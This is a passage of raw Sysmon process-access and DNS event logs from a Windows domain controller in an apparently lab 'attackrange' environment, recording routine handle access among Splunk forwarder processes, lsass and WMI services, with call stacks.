Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007888Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.491{10ACEC4A-85F7-5FCF-5A01-000000009101}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007887Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.082{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007886Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.082{10ACEC4A-853E-5FCF-0B00-000000009101}8641112C:\Windows\system32\lsass.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007885Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.066{10ACEC4A-85F6-5FCF-5901-000000009101}45164608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000007901Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:07.195{10ACEC4A-85F6-5FCF-5901-000000009101}4516win-dc-935.attackrange.local0fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 10341000x80000000000000007977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85F6-5FCF-5901-000000009101}4516C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85F0-5FCF-4901-000000009101}3056C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85F0-5FCF-4901-000000009101}3056C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85E9-5FCF-1F01-000000009101}3136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85E9-5FCF-1F01-000000009101}3136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85CA-5FCF-FE00-000000009101}3664C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8575-5FCF-8600-000000009101}4628C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\W